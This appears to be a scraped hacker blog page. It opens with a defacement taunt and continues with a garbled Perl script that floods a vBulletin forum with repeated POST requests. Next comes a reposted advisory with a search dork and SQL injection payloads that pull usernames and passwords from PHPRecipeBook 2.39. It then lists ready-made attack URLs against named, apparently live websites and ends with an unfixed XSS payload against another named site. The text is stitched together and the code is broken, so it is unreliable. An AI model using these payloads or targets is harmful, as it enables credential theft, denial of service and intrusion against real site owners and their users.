
Hey nj3ctor, your lamer blog has just been defaced
Reasons: rips and other things
pWnt By l3d & BlAcK HaT – Securityspl0its-Forums

######################################
if (@ARGVvBulletin® Version 3.8.2);
chomp($ziel =);
if ($ziel eq”"){
die “$fehler\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Path->);
chomp($path =);
if ($path eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print “Verwundbarkeit\n”;
print”forumdisplay.php?f=\n”;
print”->”n;
chomp($vul =);
if ($vul eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Time->);
chomp($flood =);
if ($flood eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Port->);
chomp($port =);
if ($port eq “”){
die “$fehler \n”;}
print”$block\n”;
print q(Send “start”->);
chomp($start =);
if ($start eq “”) {
die “$fehler\n”;}
print “$block\a\n”;
print “[+]Konntroliere Daten \n”;
print “[*]Kontroliere Ziel : $ziel\n”;
print “[*]Kontroliere Board : $path\n”;
print “[*]Kontroliere Port : $port\n”;
print “$block\n”;
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = “$ziel”.”$path”.”$vul”;
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => “$ziel”,
PeerPort => “$port”,
Proto => “tcp”,
);print $sock “POST $path$vul HTTP/1.1\n”;
print $sock “Host: $ziel\n”;
print $sock “Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n”;
print $sock “Referer: $ziel\n”;
print $sock “Accept-Language: en-us\n”;
print $sock “Content-Type: application/x-www-form-urlencoded\n”;
print $sock “User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n”;
print $sock “Content-Length: $lrg\n\n”;
print $sock “$postit\n”;
close($sock);
syswrite STDOUT, “->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}
Download PHPRecipeBook: http://phprecipebook.sourceforge.net/
spl0itz: http://www.milw0rm.com/exploits/8330
//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK – GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
*****************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/
[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:”/index.php?m=” “PHPRecipeBook 2.39″
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz
[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back
*****************************************************
//////////////////////////////////////////////////////////////////////
*****************************************************
[-- Bugs --](+)
/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]
[-- SQL EXPLOIT --]
Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users–
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users–
# milw0rm.com [2009-03-31]
Here are two vulnerable sites:
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (user names)
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (user passwords)
—
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (user names)
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users– (user passwords)
In this article I will limit myself to explaining to webmasters and to the users of a site how to defend against XSS.
As for developers, they must check every piece of information entered as input by users before passing it on to their applications.
As for users, they need do nothing more than keep their browsers up to date, since by now every one of them can block JavaScript, VBScript and ActiveX scripts.
(Info on how to protect yourself from XSS)
XSSed site:
trojan.it
XSS:
http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E
Author:
nj3ctor
Status:
UNFIXED